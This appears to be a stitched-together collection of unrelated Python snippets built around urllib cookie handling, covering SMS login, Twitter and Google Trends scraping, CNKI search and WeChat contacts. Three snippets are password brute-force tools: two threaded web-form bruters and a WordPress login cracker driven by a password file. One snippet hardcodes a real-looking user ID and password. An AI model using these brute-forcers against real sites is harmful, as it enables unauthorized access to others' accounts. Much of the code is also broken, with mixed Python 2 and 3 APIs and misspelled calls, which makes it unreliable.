def fetion(msg): cj = cookielib.LWPCookieJar() opener = urllib.build_opener(urllib.HTTPCookieProcessor(cj)) urllib.install_opener(opener) args = {'pass': password, 'm': user, 'loginstatus': loginstatus} print('Logining...') req = urllib.Request(url_login, urllib.urlencode(args)) jump = opener.open(req) page = jump.read() url = re.compile(r'<card id="start".*?ontimer="(.*?);').findall(page)[ 0] #��ȡ��ת���� arg_t = re.compile(r't=(\d*)').findall(page)[0] if url == '/im/login/login.action': #��¼ʧ�� print('Login Failed!') input('Press any key to exit.') return else: print('Login Successfully!') sendmsg = urllib.Request( url_msg, urllib.urlencode({'msg': msg.decode('gbk').encode('utf-8')})) finish = urllib.urlopen(sendmsg) if finish.geturl == 'http://f.10086.cn/im/user/sendMsgToMyself.action': print('Send Failed!') else: print('Send Successfully') logout = urllib.Request(url_logout + arg_t) response = urllib.urlopen(logout) #ע�� print('Logout Successfully!')
def web_bruter(self): while not self.password_q.empty() and not self.found: brute = self.password_q.get().rstrip() jar = cookielib.FileCookieJar("cookies") opener = urllib.request.build_opener( urllib.HTTPCookieProcessor(jar)) response = opener.open(self.target_get_form_url) page = response.read() print( f"[*] Trying {self.username} : {brute} ({self.password_q.qsize()} Left)" ) # parse out the hidden fields parser = self.parser_class() parser.feed(page) post_tags = parser.tag_results # add our username and password fields post_tags[self.username_field] = self.username post_tags[self.password_field] = brute login_data = urllib.parse.urlencode(post_tags) login_response = opener.open(self.target_post_form_url, login_data) login_result = login_response.read() if self.success_checker(login_result): self.found = True print("[*] Bruteforce Successful!") print(f"[*] Username : {self.username}") print(f"[*] Password : {brute}") print("[*] Waiting for other threads to exit!")
def web_bruter(self): while not self.password_q.empty() and not self.found: brute = self.password_q.get().rstrip() jar = HC.FileCookieJar('cookies') opener = urllib.build_opener(urllib.HTTPCookieProcessor(jar)) response = opener.open(target_url) page = response.read() print('Trying:%s:%s(%d left)' % (self.username, brute, self.password_q.qsize())) parser = BruteParser() parser.feed(page) post_tags = parser.tag_result post_tags[username_field] = self.username post_tags[password_field] = brute login_data = urllib.urlencode(post_tags) login_response = opener.open(target_post, login_data) login_result = login_response.read() if success_check in login_result: self.found = True print('[*] Bruteforce successful.') print('[*]Username:%s' % username) print('[*]Password:%s' % brute) print('[*]Waiting for other threads to exit...')
def __init__(self): self.cookie_j = cookiejar.CookieJar() cookie_h = request.HTTPCookieProcessor(self.cookie_j) self.opener = request.build_opener(cookie_h) #self.opener = request.FancyURLopener() self.opener.addheaders = [('User-agent', random.choice(AGENTS))] if 'init' in dir(self): self.init()
def getJsonReponse(tweetCriteria, refreshCursor, cookieJar, proxy): """Actually obtains the tweets and returns an object that can be read""" url = "https://twitter.com/i/search/timeline?f=tweets&q=%s&src=typd&max_position=%s" urlGetData = '' if hasattr(tweetCriteria, 'username'): urlGetData += ' from:' + tweetCriteria.username if hasattr(tweetCriteria, 'querySearch'): urlGetData += ' ' + tweetCriteria.querySearch if hasattr(tweetCriteria, 'near'): urlGetData += "&near:" + tweetCriteria.near + " within:" + tweetCriteria.within if hasattr(tweetCriteria, 'since'): urlGetData += ' since:' + tweetCriteria.since if hasattr(tweetCriteria, 'until'): urlGetData += ' until:' + tweetCriteria.until if hasattr(tweetCriteria, 'topTweets'): if tweetCriteria.topTweets: url = "https://twitter.com/i/search/timeline?q=%s&src=typd&max_position=%s" url = url % (urllib.parse.quote(urlGetData), refreshCursor) headers = [('Host', "twitter.com"), ('User-Agent', "Mozilla/5.0 (Windows NT 6.1; Win64; x64)"), ('Accept', "application/json, text/javascript, */*; q=0.01"), ('Accept-Language', "de,en-US;q=0.7,en;q=0.3"), ('X-Requested-With', "XMLHttpRequest"), ('Referer', url), ('Connection', "keep-alive")] if proxy: opener = urllib.request.build_opener( urllib.request.ProxyHandler({ 'http': proxy, 'https': proxy }), urllib.HTTPCookieProcessor(cookieJar)) else: opener = urllib.request.build_opener( urllib.request.HTTPCookieProcessor(cookieJar)) opener.addheaders = headers try: response = opener.open(url) jsonResponse = response.read() except: print( "Twitter weird response. Try to see on browser: https://twitter.com/search?q=%s&src=typd" % urllib.parse.quote(urlGetData)) sys.exit() return dataJson = json.loads(jsonResponse) return dataJson
def save_cookie(self, fileName, url): #不能在有别的实例运行时执行 #声明一个MozillaCookieJar实例保存cookie cookie = http.cookiejar.MozillaCookieJar(fileName) #构建opener opener = urllib.build_opener(urllib.HTTPCookieProcessor(cookie)) urllib.install_opener(opener) request = urllib.Request.open(url) request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36') response = urllib.urlopen(request) print (response.getcode()) cookie.save(ignore_discard=True, ignore_expires=True) print ('Successfully saved')
def __init__(self): self.cj = requests.get("https://trends.google.com/").cookies self.opener = urllib.build_opener(urllib.HTTPCookieProcessor(self.cj)) self.opener.addheaders = [ ("Referrer", "https://trends.google.com/trends/explore"), ('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.21 (KHTML, like Gecko) Chrome/19.0.1042.0 Safari/535.21' ), ("Accept", "text/plain") ] self.api = { "Interest over time": 'https://trends.google.com/trends/api/widgetdata/multiline/csv?', "Interest by region": 'https://trends.google.com/trends/api/widgetdata/comparedgeo/csv?', "Related topics": 'https://trends.google.com/trends/api/widgetdata/relatedsearches/csv?', "Related queries": 'https://trends.google.com/trends/api/widgetdata/relatedsearches/csv?' } self.widgets = None self.widget_params = []
# -*- coding:utf-8 -*- import http.cookiejar import urllib import bs4 import re from bs4 import BeautifulSoup cookie = http.cookiejar.MozillaCookieJar() # 声明一个CookieJar对象实例来保存cookie cookie.load('cookies_csddn.txt',ignore_discard=False,ignore_expires=False) # 利用urllib2库的HTTPCookieProcessor对象来创建cookie处理器 user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' # 用header保存模拟的请求身份 headers = {'User-Agent': user_agent, 'Referer': 'http://my.csdn.net/'} url = "http://my.csdn.net/" rq_body = '' req = urllib.Request(url, rq_body, headers) opener = urllib.build_opener(urllib.HTTPCookieProcessor(cookie)) response = opener.open(req) print response.read()
def refresh(self): """ 清空现有cookie,重新设置搜索选项并生成cookie """ cookie = cookiejar.CookieJar() opener = urllib.build_opener(urllib.HTTPCookieProcessor(cookiejar)) # Step 1: cookiejar记录ASP.NET_SessionId,LID,LID,SID_kns try: opener.open("http://epub.cnki.net/kns/brief/default_result.aspx") except: print "EXCEPTION(" + time.strftime( "%Y-%m-%d %H:%M:%S") + "):刷新Cookie时发生异常,休息" + str( self.config.get("urlopenExceptRetryInterval")) + "秒后重试" time.sleep(self.config.get("urlopenExceptRetryInterval")) opener.open("http://epub.cnki.net/kns/brief/default_result.aspx") # Step 2: 登录 try: opener.open("http://epub.cnki.net/kns/Request/login.aspx?&td=" + str(int(time.time() * 1000))) except: print "EXCEPTION(" + time.strftime( "%Y-%m-%d %H:%M:%S") + "):刷新Cookie时发生异常,休息" + str( self.config.get("urlopenExceptRetryInterval")) + "秒后重试" time.sleep(self.config.get("urlopenExceptRetryInterval")) opener.open("http://epub.cnki.net/kns/Request/login.aspx?&td=" + str(int(time.time() * 1000))) # Step 3: 设置搜索选项 data = urllib.urlencode(self.config.get('search')) self.config.set("Cookie", self.generateCookieString(cookie), "headers") headers = self.config.get("headers") request = urllib.Request( "http://epub.cnki.net/KNS/request/SearchHandler.ashx", data, headers) try: opener.open(request) except: print "EXCEPTION(" + time.strftime( "%Y-%m-%d %H:%M:%S") + "):刷新Cookie时发生异常,休息" + str( self.config.get("urlopenExceptRetryInterval")) + "秒后重试" time.sleep(self.config.get("urlopenExceptRetryInterval")) opener.open(request) additional = { "RsPerPage": self.config.get("RecordsPerPage", "list"), "cnkiUserKey": self.generateCnkiUserKey() } self.cookie = self.generateCookieString(cookie, additional) # Step 4:请求列表页第1页,设置检索参数 data = urllib.parse.urlencode(self.config.get('listPageOne')) self.config.set("Cookie", self.cookie, "headers") headers = self.config.get("headers") request = urllib.Request("http://epub.cnki.net/kns/brief/brief.aspx", data, headers) try: response = opener.open(request) except: print "EXCEPTION(" + time.strftime( "%Y-%m-%d %H:%M:%S") + "):刷新Cookie时发生异常,休息" + str( self.config.get("urlopenExceptRetryInterval")) + "秒后重试" time.sleep(self.config.get("urlopenExceptRetryInterval")) response = opener.open(request) # 获取总页数 soup = BeautifulSoup(response.read()) if soup.find('span', {"class": "countPageMark"}): s = soup.find('span', {"class": "countPageMark"}).get_text() s = s.split("/") if len(s) >= 2: self.totalListPage = int(s[1]) return self.cookie
def main(): opener = urllib.build_opener( urllib.HTTPCookieProcessor(cookielib.CookieJar())) urllib.install_opener(opener) if getUUID() == False: print('获取uuid失败') return showQRImage() time.sleep(1) while waitForLogin() != '200': pass os.remove(QRImagePath) if login() == False: print('登录失败') return if webwxinit() == False: print('初始化失败') return MemberList = webwxgetcontact() MemberCount = len(MemberList) print('通讯录共%s位好友') % MemberCount ChatRoomName = '' result = [] for i in range(0, int(math.ceil(MemberCount / float(MAX_GROUP_NUM)))): UserNames = [] NickNames = [] DeletedList = '' for j in range(0, MAX_GROUP_NUM): if i * MAX_GROUP_NUM + j >= MemberCount: break Member = MemberList[i * MAX_GROUP_NUM + j] UserNames.append(Member['UserName']) NickNames.append(Member['NickName'].encode('utf-8')) print('第%s组...') % (i + 1) print(', '.join(NickNames)) print('回车键继续...') input('say soemthing:') # 新建群组/添加成员 if ChatRoomName == '': (ChatRoomName, DeletedList) = createChatroom(UserNames) else: DeletedList = addMember(ChatRoomName, UserNames) DeletedCount = len(DeletedList) if DeletedCount > 0: result += DeletedList print('找到%s个被删好友') % DeletedCount # raw_input() # 删除成员 deleteMember(ChatRoomName, UserNames) # todo 删除群组 resultNames = [] for Member in MemberList: if Member['UserName'] in result: NickName = Member['NickName'] if Member['RemarkName'] != '': NickName += '(%s)' % Member['RemarkName'] resultNames.append(NickName.encode('utf-8')) print('---------- 被删除的好友列表 ----------') print('\n'.join(resultNames)) print('-----------------------------------')
import urllib import cookielib #声明一个CookieJar对象实例来保存cookie cookie = cookielib.CookieJar() #利用urllib2库的HTTPCookieProcessor对象来创建cookie处理器 handler = urllib.HTTPCookieProcessor(cookie) #通过handler来构建opener opener = urllib.build_opener(handler) #此处的open方法同urllib2的urlopen方法,也可以传入request response = opener.open('http://www.baidu.com') for item in cookie: print('Name = ' + item.name) print('Value = ' + item.value) #利用cookie请求访问另一个网址 gradeUrl = 'http://www.baidu.com/xxx/xx' #请求访问 result = opener.open(gradeUrl) print(result.read())
def __init__(self, host, username): self.username = username self.host = host self.http = 'http://' + host self.url = self.http + '/wp-admin/' self.user_agent = 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)' self.referer = self.http + '/wp-login.php' self.cook = 'wordpress_test_cookie=WP+Cookie+check' # 初始化定义 header 避免被服务器屏蔽 self.hraders = { 'User-Agent': self.user_agent, "Cookie": self.cook, "Referer": self.referer, "Host": self.host } self.cookie = cookielib.CookieJar() self.opener = urllib.buid_opener( urllib.HTTPCookieProcessor(self.cookie)) def crash(self, filename): try: pwd = open(filename, 'r') # 读取密码文件,密码文件中密码越多破解的概率越大 while 1: i = pwd.readline() if not i: break data = urllib.urlencode({ "log": self.username, "pwd": i.strip(), "testcookie": "1", "redirect_to": self.redirect }) req = urllib.Request(url=self.url, data=data, headers=self.hraders) # 构造好数据包之后提交给wordpress网站后台 res = urllib.urlopen(req) reslut = res.read() login = re.search(r'login_error', reslut) # 判断返回来的字符串,如果有login error说明失败 if login: pass else: print('crashed! passwd is %s %s' % (self.username, i.strip())) f = open('wordprocess.txt', 'w+') f.write('crashed! passwd is %s %s' % (self.username, i.strip())) pwd.close() f.close() # 如果匹配到密码,则这次任务完成,退出程序 exit() break pwd.close() except Exception as e: print(e)
def _set_cookie(self, fileName): cookie = http.cookiejar.MozillaCookieJar() cookie.load(fileName, ignore_discard=True, ignore_expires=True) opener = urllib.build_opener(urllib.HTTPCookieProcessor(cookie)) urllib.install_opener(opener)
import urllib import urllib.request import http.cookiejar import string import re hosturl = 'https://os.ncuos.com/api/user/token' posturl = 'https://os.ncuos.com/api/user/token' cj = http.cookieljar.CookieJar() cookie_support = urllib.HTTPCookieProcessor(cj) opener = urllib.build_opener(cookie_support,urllib.HTTPHandler) urllib.install_opener(opener) h = urllib.urlopen(hosturl) headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36', 'Referer':'https://os.ncuos.com/api/user/token'} postData = {'op' : 'dmlogin', 'f' : 'st', 'user' : '8002118162', 'pass' : '200617', 'rmbr' : 'ture', 'tmp' : '0.0008502006530761719s' } postData = urllib.urllib.urlencode(postData) request = urllib.Request(posturl,postData,headers)